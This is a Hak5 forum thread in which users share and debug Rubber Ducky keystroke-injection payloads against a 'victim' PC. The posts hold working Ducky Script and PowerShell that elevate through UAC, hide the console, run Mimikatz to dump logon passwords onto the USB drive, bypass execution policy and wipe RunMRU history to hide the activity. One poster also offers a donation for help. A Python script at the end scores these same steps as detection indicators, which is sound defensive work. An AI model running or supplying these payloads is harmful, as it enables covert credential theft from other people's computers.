MrSnowMonster, posted November 3, 2016 (edited)

!! EDIT !! Now updated so it should be very fast and effective !! This is a remake of my bashbunny script so it works on the rubberducky too: https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/InfoGrabber

Hello everyone! I made this nice script that gives you a lot of information about your victim's computer and stores it on the rubberducky if it runs twin duck firmware, for example their ip and public ip. Change it as much as you want, but please credit me as the source since I spent around 15 hours on this.

It executes in around 6 seconds :) It also finds more information than it did before :) Just drag the files I upload into your rubberducky running twin duck firmware. You can also see the inject.txt in there so you can convert it to the language you want :) The rubberducky also has to have the name DUCKY for this script to work, because the command it runs is searching for a usb with the name DUCKY.

Remember this only works if you use the twin duck firmware on your rubberducky. :) The information you grab from your victim will be saved inside a folder called Loot.

You can either download the files from my github https://github.com/MrSnowMonster/MrSnows-SnowGlobe/tree/master/Tech/Hacking and Pentesting/RubberDucky/Infograbber rubberducky version or download the rar file I uploaded here. :)

Attachment: info.zip

Edited May 22, 2017 by MrSnowMonster: Made a few changes to make it more accurate
Enzym3, posted November 8, 2016

I haven't tested it out, but just from quickly scrolling through the code I see a handful of ways to refactor the code and speed it up. It's also always a good idea to run any shell as administrator to avoid errors with user privileges.

Lastly, if you choose to go the route of pressing 'ALT + Y' to select the 'Yes' option for the UAC popup, you should always account for any victim's system that has UAC disabled. If you don't account for them, whenever you do encounter one, the very first character typed into the shell will be a lowercase 'y'. Everything following will be rendered effectively useless. There are a few options to easily deal with that. The route I choose to go is:

```
REM -- This would be the beginning of the script. 2 second delay to allow USB to enumerate in victim's PC.
DELAY 2000
REM -- Press Win + R to open 'Run'.
GUI R
DELAY 100
REM -- Start Powershell as administrator (alternatively you can substitute 'CMD' if you prefer).
STRING powershell Start-Process powershell -Verb runAs
ENTER
DELAY 300
REM -- Press 'ALT + Y' to choose 'Yes' option for UAC dialog box.
ALT y
DELAY 300
REM -- To account for any victim with UAC disabled, cursor will shift left once and press 'DELETE' to remove lowercase 'y' from the shell.
REM -- Any victim with UAC enabled, pressing LEFTARROW + DELETE effectively does nothing, which allows us to account for both scenarios.
LEFTARROW
DELETE
<...>
```

Overall, nice work. I'll check it out in a bit to see how it performs :) Happy hacking!

-Enzym3
Enzym3, posted November 8, 2016

Nice :) About how long does it take for the ducky to deliver the payload before you're able to remove it?
bananacake, posted May 21, 2017

> On 11/9/2016 at 7:37 PM, MrSnowMonster said:
> @Enzym3 I made it faster with a few tweaks so it should now take under 30 seconds :)

Your old Github links don't work. Mind sharing your new tweaked payload again? Thank you.
MrSnowMonster (author), posted May 21, 2017 (edited)

> 57 minutes ago, bananacake said:
> Your old Github links don't work. Mind sharing your new tweaked payload again? Thank you.

Hey! I no longer have this script because I started using the twin duck firmware and made my bashbunny script work on the rubberducky. :) It still does the same, but because of the twin duck firmware you no longer have to send the information through mail, and it is A LOT faster.

It executes in around 6 seconds :) It also finds more information than it did before :) Just drag the files I upload into your rubberducky running twin duck firmware. You can also see the inject.txt in there so you can convert it to the language you want :) The rubberducky also has to have the name DUCKY for this script to work, because the command it runs is searching for a usb with the name DUCKY.

Hope this helps :)

!!Edit!! Remember this only works if you use the twin duck firmware on your rubberducky. :) The information you grab from your victim will be saved inside a folder called Loot. !!Edit!!

You can either download the files from my github https://github.com/MrSnowMonster/MrSnows-SnowGlobe/tree/master/Tech/Hacking and Pentesting/RubberDucky/Infograbber rubberducky version or download the rar file I uploaded here. :)

Attachment: info.zip

Edited May 21, 2017 by MrSnowMonster
bananacake, posted May 22, 2017

Thanks a bunch SnowMonster. This script is excellent and works perfectly. I wonder if it would be possible to add mimikatz to the payload after the information gathering stage. Other mimikatz payloads first start cmd.exe as admin before executing mimikatz through powershell commands. For example:

```
DELAY 2000
GUI r
DELAY 500
STRING powershell Start-Process cmd.exe -verb runAs
ENTER
DELAY 2000
ALT y
DELAY 500
CTRL C
REM *** Obfuscate the command prompt ***
STRING mode con:cols=18 lines=1
ENTER
STRING color FE
ENTER
REM *** Define Ducky Drive as DUCK ***
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
ENTER
DELAY 500
REM *** Run Mimikatz from Ducky Drive ***
STRING powershell %duck%\im.ps1 -DumpCreds >> %duck%\%computername%-passwords.txt
ENTER
DELAY 100
STRING privilege::debug
ENTER
STRING sekurlsa::logonPasswords full
ENTER
DELAY 10000
STRING exit
ENTER
DELAY 5000
REM *** Clear duck variable, history, and GTFO ***
STRING set "duck="
ENTER
DELAY 100
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
DELAY 100
STRING color 08
ENTER
DELAY 100
STRING exit
ENTER
```

As you can see this is slower than simply executing several pre-made powershell files and requires admin cmd to start (which may be restricted in corporate environments.) I am wondering if it is possible to cut this stage out entirely and create a payload similar to your information gathering payload? Thanks again.
MrSnowMonster (author), posted May 22, 2017 (edited)

> 43 minutes ago, bananacake said:
> Thanks a bunch SnowMonster. This script is excellent and works perfectly. I wonder if it would be possible to add mimikatz to the payload after the information gathering stage. Other mimikatz payloads first start cmd.exe as admin before executing mimikatz through powershell commands. For example:
>
> ```
> DELAY 2000
> GUI r
> DELAY 500
> STRING powershell Start-Process cmd.exe -verb runAs
> ENTER
> DELAY 2000
> ALT y
> DELAY 500
> CTRL C
> REM *** Obfuscate the command prompt ***
> STRING mode con:cols=18 lines=1
> ENTER
> STRING color FE
> ENTER
> REM *** Define Ducky Drive as DUCK ***
> STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
> ENTER
> DELAY 500
> REM *** Run Mimikatz from Ducky Drive ***
> STRING powershell %duck%\im.ps1 -DumpCreds >> %duck%\%computername%-passwords.txt
> ENTER
> DELAY 100
> STRING privilege::debug
> ENTER
> STRING sekurlsa::logonPasswords full
> ENTER
> DELAY 10000
> STRING exit
> ENTER
> DELAY 5000
> REM *** Clear duck variable, history, and GTFO ***
> STRING set "duck="
> ENTER
> DELAY 100
> STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
> ENTER
> DELAY 100
> STRING color 08
> ENTER
> DELAY 100
> STRING exit
> ENTER
> ```
>
> As you can see this is slower than simply executing several pre-made powershell files and requires admin cmd to start (which may be restricted in corporate environments.) I am wondering if it is possible to cut this stage out entirely and create a payload similar to your information gathering payload? Thanks again.

This is very easy to do, just make a script file which holds the mimikatz code and place this code in the run.ps1 script file in the payloads folder :)

The code: "PowerShell.exe -ExecutionPolicy Bypass -File mimikatz.ps1" (remember to remove the " thingy :))

A little info about why this works. The code bypasses the windows script policy so it won't need to allow scripts to run, and in this way makes it possible to run scripts without using an administrator account :)

You're welcome! Always fun to know people find the help I give and things I create useful! :D

!!EDIT!! If I were you I would look at the run.ps1 script and see if I could understand how it works. It may help you later, because it's a great way to bypass a lot of unnecessary typing. :D Remember to remove the last string in run.ps1 if you want to change it so it only runs mimikatz.

Edited May 22, 2017 by MrSnowMonster
bananacake, posted May 22, 2017

> 28 minutes ago, MrSnowMonster said:
> This is very easy to do, just make a script file which holds the mimikatz code and place this code in the run.ps1 script file in the payloads folder :)
>
> The code: "PowerShell.exe -ExecutionPolicy Bypass -File mimikatz.ps1" (remember to remove the " thingy :))
>
> A little info about why this works. The code bypasses the windows script policy so it won't need to allow scripts to run, and in this way makes it possible to run scripts without using an administrator account :)
>
> You're welcome! Always fun to know people find the help I give and things I create useful! :D
>
> !!EDIT!! If I were you I would look at the run.ps1 script and see if I could understand how it works. It may help you later, because it's a great way to bypass a lot of unnecessary typing. :D

Thanks for such a quick reply :D Send me your bitcoin address or paypal in a PM for a little donation.

I have already been fiddling with the run.ps1 before your post. Unfortunately not had any luck so far. I added mimikatz.ps1 to the payloads folder (https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1). I have made the following changes to run.ps1:

```powershell
#Remove run history
powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"

#Get the path and file name that you are using for output
# find connected bashbunny drive:
$VolumeName = "DUCKY"
$computerSystem = Get-CimInstance CIM_ComputerSystem
$backupDrive = $null
get-wmiobject win32_logicaldisk | % {
    if ($_.VolumeName -eq $VolumeName) { $backupDrive = $_.DeviceID }
}

#See if a loot folder exist in usb. If not create one
$TARGETDIR = $backupDrive + "\loot"
if(!(Test-Path -Path $TARGETDIR )){
    New-Item -ItemType directory -Path $TARGETDIR
}

#See if a info folder exist in loot folder. If not create one
$TARGETDIR = $backupDrive + "\loot\info"
if(!(Test-Path -Path $TARGETDIR )){
    New-Item -ItemType directory -Path $TARGETDIR
}

#See if a passwords folder exist in loot folder. If not create one
$TARGETDIR = $backupDrive + "\loot\passwords"
if(!(Test-Path -Path $TARGETDIR )){
    New-Item -ItemType directory -Path $TARGETDIR
}

#Create a path that will be used to make the file
$datetime = get-date -f yyyy-MM-dd_HH-mm
$backupPath = $backupDrive + "\loot\info\" + $computerSystem.Name + " - " + $datetime + ".txt"
$passwordPath = $backupDrive + "\loot\passwords\" + "passwords" + ".txt"

#Create output from info script
$TARGETDIR = $MyInvocation.MyCommand.Path
$TARGETDIR = $TARGETDIR -replace ".......$"
cd $TARGETDIR
PowerShell.exe -ExecutionPolicy Bypass -File info.ps1 > $backupPath
PowerShell.exe -ExecutionPolicy Bypass -File mimikatz.ps1 -DumpCerts >> $passwordPath
```

When I run run.ps1, info.ps1 executes correctly as usual; afterwards a new powershell window is opened and a passwords folder is created along with a passwords.txt file. However the passwords.txt file is empty. I'm pretty sure mimikatz is running as my cursor displays a loading timer icon, it's just not outputting the file correctly and I'm not sure exactly what to do to fix this. Any help is appreciated. Thank you.
MrSnowMonster (author), posted May 22, 2017

> 7 minutes ago, bananacake said:
> Thanks for such a quick reply :D Send me your bitcoin address or paypal in a PM for a little donation.
>
> I have already been fiddling with the run.ps1 before your post. Unfortunately not had any luck so far. I added mimikatz.ps1 to the payloads folder (https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1). I have made the following changes to run.ps1:
>
> ```powershell
> #Remove run history
> powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
>
> #Get the path and file name that you are using for output
> # find connected bashbunny drive:
> $VolumeName = "DUCKY"
> $computerSystem = Get-CimInstance CIM_ComputerSystem
> $backupDrive = $null
> get-wmiobject win32_logicaldisk | % {
>     if ($_.VolumeName -eq $VolumeName) { $backupDrive = $_.DeviceID }
> }
>
> #See if a loot folder exist in usb. If not create one
> $TARGETDIR = $backupDrive + "\loot"
> if(!(Test-Path -Path $TARGETDIR )){
>     New-Item -ItemType directory -Path $TARGETDIR
> }
>
> #See if a info folder exist in loot folder. If not create one
> $TARGETDIR = $backupDrive + "\loot\info"
> if(!(Test-Path -Path $TARGETDIR )){
>     New-Item -ItemType directory -Path $TARGETDIR
> }
>
> #See if a passwords folder exist in loot folder. If not create one
> $TARGETDIR = $backupDrive + "\loot\passwords"
> if(!(Test-Path -Path $TARGETDIR )){
>     New-Item -ItemType directory -Path $TARGETDIR
> }
>
> #Create a path that will be used to make the file
> $datetime = get-date -f yyyy-MM-dd_HH-mm
> $backupPath = $backupDrive + "\loot\info\" + $computerSystem.Name + " - " + $datetime + ".txt"
> $passwordPath = $backupDrive + "\loot\passwords\" + "passwords" + ".txt"
>
> #Create output from info script
> $TARGETDIR = $MyInvocation.MyCommand.Path
> $TARGETDIR = $TARGETDIR -replace ".......$"
> cd $TARGETDIR
> PowerShell.exe -ExecutionPolicy Bypass -File info.ps1 > $backupPath
> PowerShell.exe -ExecutionPolicy Bypass -File mimikatz.ps1 -DumpCerts >> $passwordPath
> ```
>
> When I run run.ps1, info.ps1 executes correctly as usual; afterwards a new powershell window is opened and a passwords folder is created along with a passwords.txt file. However the passwords.txt file is empty. I'm pretty sure mimikatz is running as my cursor displays a loading timer icon, it's just not outputting the file correctly and I'm not sure exactly what to do to fix this. Any help is appreciated. Thank you.

Try using

```powershell
PowerShell.exe -ExecutionPolicy Bypass -File mimikatz.ps1 -DumpCerts > $passwordPath
```

Not really sure what the problem is but looks like you may have one > too many :) If I were you I would try to run the line in a powershell command window and see if there are any errors showing up :D You could also try to remove the -DumpCerts :)

Just happy to help, finally had a break from my exams so I use the time to code :P
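The payloads discussed in this thread leave a recognisable trail in Windows process-creation telemetry: a shell elevated from the Run dialog with `Start-Process ... -Verb runAs`, a `wmic volume` lookup filtered with `findstr "DUCKY"`, scripts launched with `-ExecutionPolicy Bypass -File`, a console shrunk with `mode con:cols=18 lines=1`, and the RunMRU key being cleared with `Remove-ItemProperty`. The following is an added example, not code from any post in this thread, showing how a defender can score such command lines per host and user so that the cluster of indicators fires even when each one alone (an admin elevating a shell, say) is routine. The pipe-separated log format, the rule names, the weights and the sample events are all constructed assumptions for illustration, not any product's schema.

```python
"""Session-level scoring of process-creation command lines for the indicators
named in the Hak5 thread above. Constructed example: log format, rule names,
weights and sample events are assumptions, not a real product schema."""
import re
from collections import defaultdict

# (rule name, pattern, weight). Patterns mirror the command lines quoted in
# the thread; the weights are an illustrative assumption.
RULES = [
    ("run_dialog_elevation", r"start-process\s+\S+\s+-verb\s+runas", 2),
    ("execpolicy_bypass_file", r"-executionpolicy\s+bypass\s+-file", 2),
    ("runmru_clear", r"remove-itemproperty.*\\runmru", 3),
    ("wmic_volume_enum", r"wmic\s+volume\s+get\s+driveletter", 1),
    ("ducky_label_search", r"findstr\s+\"?ducky", 3),
    ("console_shrink", r"mode\s+con:\s*cols=\d+\s+lines=\d+", 1),
]
COMPILED = [(name, re.compile(pat, re.I), w) for name, pat, w in RULES]
THRESHOLD = 3  # one strong rule, or two weaker ones, flags the session


def parse_line(line):
    """Constructed format: time|host|user|parent|commandline.
    Returns None for malformed or empty lines."""
    parts = line.rstrip("\n").split("|", 4)
    if len(parts) != 5:
        return None
    time, host, user, parent, cmd = parts
    return {"time": time, "host": host, "user": user, "parent": parent, "cmd": cmd}


def match_rules(cmd):
    """Return [(rule, weight)] for every rule whose pattern occurs in cmd."""
    return [(name, w) for name, rx, w in COMPILED if rx.search(cmd)]


def analyze(lines, threshold=THRESHOLD):
    """Group events by (host, user), count each rule once per group, and
    return the groups whose summed weight reaches the threshold."""
    sessions = defaultdict(lambda: {"rules": {}, "cmds": []})
    for line in lines:
        ev = parse_line(line)
        if ev is None or not ev["cmd"].strip():
            continue
        hits = match_rules(ev["cmd"])
        if not hits:
            continue
        s = sessions[(ev["host"], ev["user"])]
        s["cmds"].append(ev["cmd"])
        for name, w in hits:
            s["rules"][name] = w  # distinct rules only; repeats add nothing
    findings = []
    for (host, user), s in sessions.items():
        score = sum(s["rules"].values())
        if score >= threshold:
            findings.append({"host": host, "user": user, "score": score,
                             "rules": sorted(s["rules"]), "commands": s["cmds"]})
    return sorted(findings, key=lambda f: -f["score"])


# Constructed sample events: WS01/alice shows the whole chain from the
# thread, WS02/bob is an admin elevating a shell, WS03/carol is noise.
SAMPLE_LOG = r"""
2017-05-22T10:14:58Z|WS01|alice|explorer.exe|powershell Start-Process powershell -Verb runAs
2017-05-22T10:15:01Z|WS01|alice|cmd.exe|wmic volume get driveletter, label
2017-05-22T10:15:01Z|WS01|alice|cmd.exe|findstr "DUCKY"
2017-05-22T10:15:04Z|WS01|alice|powershell.exe|PowerShell.exe -ExecutionPolicy Bypass -File info.ps1
2017-05-22T10:15:09Z|WS01|alice|powershell.exe|powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
2017-05-22T10:20:00Z|WS02|bob|explorer.exe|powershell Start-Process powershell -Verb runAs
2017-05-22T10:21:00Z|WS03|carol|cmd.exe|ping 10.0.0.1
"""

if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG.splitlines()):
        print(f"{f['host']}/{f['user']} score={f['score']} rules={', '.join(f['rules'])}")
```

The scoring deliberately keys on the sequence rather than any single command: `-Verb runAs` alone is what a helpdesk technician types every day, while a RunMRU wipe or a volume search for a label called DUCKY has almost no legitimate use and carries a high weight on its own. In production the grouping key would also include a short time window, since the thread itself notes that these payloads finish in a few seconds.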